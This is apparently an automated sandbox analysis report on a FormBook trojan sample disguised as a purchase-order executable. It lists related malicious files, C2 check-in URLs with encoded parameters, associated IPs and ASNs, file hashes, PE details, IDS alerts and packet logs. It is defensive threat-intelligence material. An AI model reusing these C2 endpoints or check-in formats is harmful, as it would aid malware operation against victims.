                                                                • www.bigplatesmallwallet.com/p2io/?rN=d8VD7828W8N&CR=O674xtRz5BQXEtA9kGCKbVIXJyLg/Uv1kEh0zcEQqY6nJSttJx1/IGytgXWEX1aNqwzs
                                                                loMStbzHSP.exeGet hashmaliciousBrowse
                                                                • www.bigplatesmallwallet.com/p2io/?sZvD8l=Spap-DKpf&7nEpiRy=O674xtRz5BQXEtA9kGCKbVIXJyLg/Uv1kEh0zcEQqY6nJSttJx1/IGytgU6ULEG2tFa9QVoShQ==
                                                                COAU7229898130.xlsxGet hashmaliciousBrowse
                                                                • www.ketodietforall.com/jzvu/?tDH=XRR8&8pqhs=iai4crrqmblIbZ8NbTff6TYSVk87qhVrjvjoE2rw9KZdYD2s+/m1/NAmtEChNYkMqGWCvw==
                                                                purchase order#034.exeGet hashmaliciousBrowse
                                                                • www.open-umbrella.com/8ufh/?EzrthRhp=q59Dr8OAwbpxjg9e4xeHJIK1cZIJWe2R7FFBvmtI2mq90uj2icseWC/7TRWfu69z5jPD&ojo0f=SzrhU8
                                                                Request for Quotation RFQ GC-0016862.PDF.exeGet hashmaliciousBrowse
                                                                • www.adhumanhealth.com/bhic/?Hp=V6ALib5X&pPX=hCOOqYuHXBu805uhnnycx3T+KYLBHddhxIpVVMBQAbCgJEGGTgUUMO8R3f12KnwfYdKz
                                                                30 percento,pdf.exeGet hashmaliciousBrowse
                                                                • www.ghorowaseba.com/kio8/?Yn=fJ2hiUQi1hpOeKUG2Couwzy3GD0q5yDtocQqTe9Wxl22Cq32RCF6+kusfpxq26VwKjQqLgOsHQ==&mvKpc=V48DupphUTS4qDu
                                                                E68-STD-239-2020-239.xlsxGet hashmaliciousBrowse
                                                                • www.asmmacademy.com/qccq/?mTalhtA0=rlaBJ8Mskrxi/2a4/edNV/AmrTlq/nR4UqkkGM1XutPnIWK2blgsIQLwr5szEXSAKovhZw==&WBb8fl=ebFl
                                                                bAcefnEUjb.exeGet hashmaliciousBrowse
                                                                • www.mateingseason.com/xle/?mdsh-n6=dZP5442chx968NwGkcaPLBUUXkuDw9f5W2ewpXC0yyYgnx4kig0eFnnjyofJrMaHs5iQCvjrWg==&lZN=7neHzjSxG
                                                                KROS Sp. z.o.o.exeGet hashmaliciousBrowse
                                                                • www.ghorowaseba.com/kio8/?EzrtzJ=apITk4789pRXUl&rZpXZ6=fJ2hiUQi1hpOeKUG2Couwzy3GD0q5yDtocQqTe9Wxl22Cq32RCF6+kusfpxq26VwKjQqLgOsHQ==
                                                                KROS Sp. z.o.o.exeGet hashmaliciousBrowse
                                                                • www.erniesimms.com/kio8/?9rj0DvY=YN+sslSXNnt/AJtQDW3tg/o15FAEVpNGgRv2M7EAJ2+Csdh8CxFY2PeyXEasYy/TyJiM&v4=Ch6Lm
                                                                Payment Slip00425.exeGet hashmaliciousBrowse
                                                                • www.erniesimms.com/kio8/?UXrxRry=YN+sslSXNnt/AJtQDW3tg/o15FAEVpNGgRv2M7EAJ2+Csdh8CxFY2PeyXH68XTvrssLL&lf2X=O0DliFfpXhCPLb

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                ext-sq.squarespace.comcorrect invoice.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                SWIFT001411983HNK.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                DOC24457188209927.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                #U4f9b#U5e94#U6750#U6599.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                PP,Sporda.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                BORMAR SA_Cotizaci#U00f3n de producto doc.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                PO889876.pdf.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                202139769574 Shipping Documents.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                wMqdemYyHm.exeGet hashmaliciousBrowse
                                                                • 198.49.23.145
                                                                d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                7824,pdf.exeGet hashmaliciousBrowse
                                                                • 198.49.23.145
                                                                PO_29_00412.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                DHL_S390201.exeGet hashmaliciousBrowse
                                                                • 198.185.159.145
                                                                triage_dropped_file.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                Wire transfer.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                mC9LnX9aGE.exeGet hashmaliciousBrowse
                                                                • 198.49.23.145
                                                                4x1cYP0PFs.exeGet hashmaliciousBrowse
                                                                • 198.49.23.145
                                                                SO.xlsm.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144
                                                                RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                                • 198.185.159.144

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                IMH-WESTUSeLECTRONIC Flight Ticket Invoice confirmationETKT XXXXX3939 INVOICE 000Z1298932 TKT Payment.exeGet hashmaliciousBrowse
                                                                • 192.145.239.54
                                                                eLECTRONIC Flight Ticket Confirmation VIS XXXXX3939 INVOICE 000Z1298932 TKT Payment.exeGet hashmaliciousBrowse
                                                                • 192.145.239.54
                                                                scan of document 5336227.xlsmGet hashmaliciousBrowse
                                                                • 192.249.126.181
                                                                scan of invoice 91510.xlsmGet hashmaliciousBrowse
                                                                • 192.249.126.181
                                                                scan of bill 0905.xlsmGet hashmaliciousBrowse
                                                                • 192.249.126.181
                                                                PO9448882.exeGet hashmaliciousBrowse
                                                                • 209.182.202.96
                                                                check 6746422.xlsmGet hashmaliciousBrowse
                                                                • 192.249.126.181
                                                                TKT eLECTRONIC Flight Ticket Confirmation VIS XXXXX83939 INVOICE 000Z1298932 TKT.exeGet hashmaliciousBrowse
                                                                • 192.145.239.54
                                                                proforma invoice.exeGet hashmaliciousBrowse
                                                                • 192.249.124.39
                                                                SOA.exeGet hashmaliciousBrowse
                                                                • 173.231.198.30
                                                                Invoice Packing List CORP Invoice R-CONM012 2021-04-26 - large shipment tools (1)2021.04.26.exeGet hashmaliciousBrowse
                                                                • 192.145.239.54
                                                                SecuriteInfo.com.Heur.32597.xlsGet hashmaliciousBrowse
                                                                • 144.208.70.30
                                                                SecuriteInfo.com.Heur.32597.xlsGet hashmaliciousBrowse
                                                                • 144.208.70.30
                                                                SecuriteInfo.com.Heur.31681.xlsGet hashmaliciousBrowse
                                                                • 144.208.70.30
                                                                Email - Payment Report.htmlGet hashmaliciousBrowse
                                                                • 23.235.214.102
                                                                PO472020.xltGet hashmaliciousBrowse
                                                                • 199.250.214.202
                                                                PO472020.xltGet hashmaliciousBrowse
                                                                • 199.250.214.202
                                                                PO472020.xltGet hashmaliciousBrowse
                                                                • 199.250.214.202
                                                                SecuriteInfo.com.Exploit.Siggen3.16583.277.xlsGet hashmaliciousBrowse
                                                                • 199.250.214.202
                                                                0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                • 173.231.192.43
                                                                XIAOZHIYUN1-AS-APICIDCNETWORKUSEDS03932,pdf.exeGet hashmaliciousBrowse
                                                                • 156.241.53.253
                                                                PAYMENT INSTRUCTIONS COPY.exeGet hashmaliciousBrowse
                                                                • 45.207.99.198
                                                                IRMEFUV8EF.exeGet hashmaliciousBrowse
                                                                • 156.241.53.103
                                                                Purchase Order-10764.exeGet hashmaliciousBrowse
                                                                • 154.210.135.241
                                                                987654OIUYFG.exeGet hashmaliciousBrowse
                                                                • 154.207.35.80
                                                                GZocMWoCzL3Rd62.exeGet hashmaliciousBrowse
                                                                • 156.254.252.104
                                                                aea58eb7_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                • 156.234.115.176
                                                                DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                                                • 156.241.53.197
                                                                krcgN6CaG9.exeGet hashmaliciousBrowse
                                                                • 156.253.123.107
                                                                0876543123.exeGet hashmaliciousBrowse
                                                                • 154.207.35.80
                                                                Invoiceo.exeGet hashmaliciousBrowse
                                                                • 154.207.58.218
                                                                x16jmZMFrN.exeGet hashmaliciousBrowse
                                                                • 154.207.58.69
                                                                ppc_unpackedGet hashmaliciousBrowse
                                                                • 156.234.199.243
                                                                NQ1vVJKBcH.exeGet hashmaliciousBrowse
                                                                • 156.253.78.210
                                                                Camscanner.New Order.09878766.exeGet hashmaliciousBrowse
                                                                • 154.222.72.30
                                                                RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                                • 156.241.53.161
                                                                REF # 166060421.docGet hashmaliciousBrowse
                                                                • 154.207.35.111
                                                                FORM C.xlsxGet hashmaliciousBrowse
                                                                • 156.255.140.216
                                                                5PthEm83NG.exeGet hashmaliciousBrowse
                                                                • 156.255.140.216
                                                                od3Y2SFzdP.rtfGet hashmaliciousBrowse
                                                                • 156.226.160.44
                                                                CLOUDFLARENETUSStatement of Account April-2021.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                2070121SN-WS for Woosim i250MSR.pif.exeGet hashmaliciousBrowse
                                                                • 162.159.133.233
                                                                FACTURA COMERCIAL_________________________________________________________PDF__.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                Quotation.exeGet hashmaliciousBrowse
                                                                • 162.159.130.233
                                                                8wx078Pm3P.exeGet hashmaliciousBrowse
                                                                • 172.67.150.158
                                                                GUaL8Nw228.exeGet hashmaliciousBrowse
                                                                • 104.21.30.57
                                                                8wx078Pm3P.exeGet hashmaliciousBrowse
                                                                • 172.67.150.158
                                                                qn8nIbPPCO.exeGet hashmaliciousBrowse
                                                                • 172.67.151.39
                                                                viMLlTHg3d.exeGet hashmaliciousBrowse
                                                                • 172.67.160.89
                                                                8n6dlwyR8l.exeGet hashmaliciousBrowse
                                                                • 104.21.58.140
                                                                GUaL8Nw228.exeGet hashmaliciousBrowse
                                                                • 104.21.30.57
                                                                qn8nIbPPCO.exeGet hashmaliciousBrowse
                                                                • 104.21.72.139
                                                                viMLlTHg3d.exeGet hashmaliciousBrowse
                                                                • 172.67.160.89
                                                                Technical data sheet.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                8n6dlwyR8l.exeGet hashmaliciousBrowse
                                                                • 172.67.160.89
                                                                v8wtfyQr7r.exeGet hashmaliciousBrowse
                                                                • 104.21.55.224
                                                                d0875029_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                Order.exeGet hashmaliciousBrowse
                                                                • 104.22.18.188
                                                                Account Ledger for 2020-APRIL 2021.exeGet hashmaliciousBrowse
                                                                • 162.159.134.233
                                                                New purchase order.exeGet hashmaliciousBrowse
                                                                • 162.159.134.233

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 367628usa.exe.log
                                                                Process:C:\Users\user\Desktop\PO 367628usa.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1314
                                                                Entropy (8bit):5.350128552078965
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4Ks2f84jE4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MxHKXfvjHKx1qHiYHKhQnoPtHoxHhAHR
                                                                MD5:8198C64CE0786EABD4C792E7E6FC30E5
                                                                SHA1:71E1676126F4616B18C751A0A775B2D64944A15A
                                                                SHA-256:C58018934011086A883D1D56B21F6C1916B1CD83206ADD1865C9BDD29DADCBC4
                                                                SHA-512:EE293C0F88A12AB10041F66DDFAE89BC11AB3B3AAD8604F1A418ABE43DF0980245C3B7F8FEB709AEE8E9474841A280E073EC063045EA39948E853AA6B4EC0FB0
                                                                Malicious:true
                                                                Reputation:moderate, very likely benign file
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.966310386635364
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:PO 367628usa.exe
                                                                File size:846336
                                                                MD5:42cf4c3943d5a839412a16a4d8b8d65d
                                                                SHA1:f26230352a412de0ca8b1ffc6fc07838b878a68a
                                                                SHA256:1ceec55d4acbb8db907798df6b1be5832f32d2d4e459c5bd08d0252a0763b30c
                                                                SHA512:06dc9e24ad16b10858fa7e24fbf2e179b09c3bba8d7cb4b94dedcab32503d2d40e1ed24949832ca37c507f183713343c4acefabd6747f197d31cd8a81b7c426f
                                                                SSDEEP:24576:257gowGuMDvk9999+n3CZMWyOe01TZNfhj1aNBQ4OFkRZ:2XDM+n3q9ldjaNBQH
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P......$.......@... ... ....@.. .......................`............@................................

                                                                File Icon

                                                                Icon Hash:f2d2e9fcc4ead362

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4d400a
                                                                Entrypoint Section:
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0x609B8ECE [Wed May 12 08:16:14 2021 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [004D4000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc28ec0x4f.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000x34b8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0xd40000x8
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0xc20000x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                ^8+S|rz0x20000xbea040xbec00False1.00031485501data7.99978876077IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                .text0xc20000xbec00xc000False0.444376627604data5.98929495854IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rsrc0xce0000x34b80x3600False0.361328125data5.24839991082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0xd20000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                0xd40000x100x200False0.044921875dBase III DBT, version number 0, next free block index 7969600.142635768149IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_ICON0xce1300x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                RT_GROUP_ICON0xd06d80x14data
                                                                RT_VERSION0xd06ec0x364data
                                                                RT_MANIFEST0xd0a500xa65XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Version Infos

                                                                DescriptionData
                                                                Translation0x0000 0x04b0
                                                                LegalCopyrightCopyright 2013
                                                                Assembly Version3.0.0.0
                                                                InternalNameCspAlgorithmType.exe
                                                                FileVersion3.0.0.0
                                                                CompanyName
                                                                LegalTrademarks
                                                                Comments
                                                                ProductNameServerManager_Core
                                                                ProductVersion3.0.0.0
                                                                FileDescriptionServerManager_Core
                                                                OriginalFilenameCspAlgorithmType.exe

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                05/12/21-14:44:17.541178TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.6209.182.202.96
                                                                05/12/21-14:44:17.541178TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.6209.182.202.96
                                                                05/12/21-14:44:17.541178TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.6209.182.202.96
                                                                05/12/21-14:44:49.882224TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.634.102.136.180
                                                                05/12/21-14:44:49.882224TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.634.102.136.180
                                                                05/12/21-14:44:49.882224TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.634.102.136.180
                                                                05/12/21-14:44:50.021295TCP1201ATTACK-RESPONSES 403 Forbidden804975234.102.136.180192.168.2.6
                                                                05/12/21-14:45:12.023558TCP1201ATTACK-RESPONSES 403 Forbidden804975434.102.136.180192.168.2.6

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                May 12, 2021 14:44:17.336447001 CEST4974480192.168.2.6209.182.202.96
                                                                May 12, 2021 14:44:17.539150953 CEST8049744209.182.202.96192.168.2.6
                                                                May 12, 2021 14:44:17.541024923 CEST4974480192.168.2.6209.182.202.96
                                                                May 12, 2021 14:44:17.541177988 CEST4974480192.168.2.6209.182.202.96
                                                                May 12, 2021 14:44:17.741841078 CEST8049744209.182.202.96192.168.2.6
                                                                May 12, 2021 14:44:18.501599073 CEST4974480192.168.2.6209.182.202.96
                                                                May 12, 2021 14:44:18.703918934 CEST8049744209.182.202.96192.168.2.6
                                                                May 12, 2021 14:44:18.704257011 CEST4974480192.168.2.6209.182.202.96
                                                                May 12, 2021 14:44:23.722388029 CEST4974580192.168.2.6156.253.106.229
                                                                May 12, 2021 14:44:26.723609924 CEST4974580192.168.2.6156.253.106.229
                                                                May 12, 2021 14:44:32.724307060 CEST4974580192.168.2.6156.253.106.229
                                                                May 12, 2021 14:44:47.595201969 CEST4975180192.168.2.6156.253.106.229
                                                                May 12, 2021 14:44:49.840913057 CEST4975280192.168.2.634.102.136.180
                                                                May 12, 2021 14:44:49.881947994 CEST804975234.102.136.180192.168.2.6
                                                                May 12, 2021 14:44:49.882071018 CEST4975280192.168.2.634.102.136.180
                                                                May 12, 2021 14:44:49.882224083 CEST4975280192.168.2.634.102.136.180
                                                                May 12, 2021 14:44:49.925158978 CEST804975234.102.136.180192.168.2.6
                                                                May 12, 2021 14:44:50.021295071 CEST804975234.102.136.180192.168.2.6
                                                                May 12, 2021 14:44:50.021327019 CEST804975234.102.136.180192.168.2.6
                                                                May 12, 2021 14:44:50.029829979 CEST4975280192.168.2.634.102.136.180
                                                                May 12, 2021 14:44:50.030330896 CEST4975280192.168.2.634.102.136.180
                                                                May 12, 2021 14:44:50.071338892 CEST804975234.102.136.180192.168.2.6
                                                                May 12, 2021 14:44:50.597404003 CEST4975180192.168.2.6156.253.106.229
                                                                May 12, 2021 14:44:56.613770008 CEST4975180192.168.2.6156.253.106.229
                                                                May 12, 2021 14:45:00.764058113 CEST4975380192.168.2.666.235.200.147
                                                                May 12, 2021 14:45:00.805219889 CEST804975366.235.200.147192.168.2.6
                                                                May 12, 2021 14:45:00.805355072 CEST4975380192.168.2.666.235.200.147
                                                                May 12, 2021 14:45:00.805551052 CEST4975380192.168.2.666.235.200.147
                                                                May 12, 2021 14:45:00.846524000 CEST804975366.235.200.147192.168.2.6
                                                                May 12, 2021 14:45:01.319247961 CEST4975380192.168.2.666.235.200.147
                                                                May 12, 2021 14:45:01.360927105 CEST804975366.235.200.147192.168.2.6
                                                                May 12, 2021 14:45:01.361038923 CEST4975380192.168.2.666.235.200.147
                                                                May 12, 2021 14:45:11.845074892 CEST4975480192.168.2.634.102.136.180
                                                                May 12, 2021 14:45:11.886277914 CEST804975434.102.136.180192.168.2.6
                                                                May 12, 2021 14:45:11.886451960 CEST4975480192.168.2.634.102.136.180
                                                                May 12, 2021 14:45:11.886488914 CEST4975480192.168.2.634.102.136.180
                                                                May 12, 2021 14:45:11.927572966 CEST804975434.102.136.180192.168.2.6
                                                                May 12, 2021 14:45:12.023557901 CEST804975434.102.136.180192.168.2.6
                                                                May 12, 2021 14:45:12.023586035 CEST804975434.102.136.180192.168.2.6
                                                                May 12, 2021 14:45:12.024002075 CEST4975480192.168.2.634.102.136.180
                                                                May 12, 2021 14:45:12.024024963 CEST4975480192.168.2.634.102.136.180
                                                                May 12, 2021 14:45:12.066961050 CEST804975434.102.136.180192.168.2.6

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                May 12, 2021 14:43:01.428555012 CEST6034253192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:01.477366924 CEST53603428.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:21.349680901 CEST6134653192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:21.398500919 CEST53613468.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:24.693722010 CEST5177453192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:24.742449045 CEST53517748.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:25.606499910 CEST5602353192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:25.658571005 CEST53560238.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:28.722441912 CEST5838453192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:28.771378040 CEST53583848.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:29.864943981 CEST6026153192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:29.913788080 CEST53602618.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:30.785602093 CEST5606153192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:30.838978052 CEST53560618.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:31.721178055 CEST5833653192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:31.771974087 CEST53583368.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:32.272595882 CEST5378153192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:32.331994057 CEST53537818.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:32.615772009 CEST5406453192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:32.667319059 CEST53540648.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:35.303809881 CEST5281153192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:35.362885952 CEST53528118.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:36.863873959 CEST5529953192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:36.912844896 CEST53552998.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:38.166874886 CEST6374553192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:38.216016054 CEST53637458.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:43.744782925 CEST5005553192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:43.796560049 CEST53500558.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:44.550431013 CEST6137453192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:44.602118969 CEST53613748.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:45.441957951 CEST5033953192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:45.495352983 CEST53503398.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:46.405951023 CEST6330753192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:46.466908932 CEST53633078.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:47.318855047 CEST4969453192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:47.367999077 CEST53496948.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:48.710267067 CEST5498253192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:48.759144068 CEST53549828.8.8.8192.168.2.6
